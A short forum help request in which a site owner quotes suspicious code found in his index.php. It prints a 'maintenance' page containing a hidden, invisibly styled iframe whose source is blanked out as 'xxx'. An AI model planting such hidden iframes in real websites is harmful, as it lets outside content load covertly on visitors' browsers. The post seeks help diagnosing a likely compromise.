For a while my website was down for a reason i didnt know. I could still login to the admin, but the front-end did not work.
Finally i discovered some weird code in my index.php file.
Code: Select all
else if (file_exists(TMP_CACHE_LOCATION.'/SITEDOWN'))
{
echo "<__html><head><title>Maintenance</title></head></__body><__iframe src="xxx" width=157 height=142 style="visibility: hidden"></__iframe><p>Site down for maintenance.</p><__body></__html>";
exit;
}
Did somebode had this problem before and knows what is going on?
Bas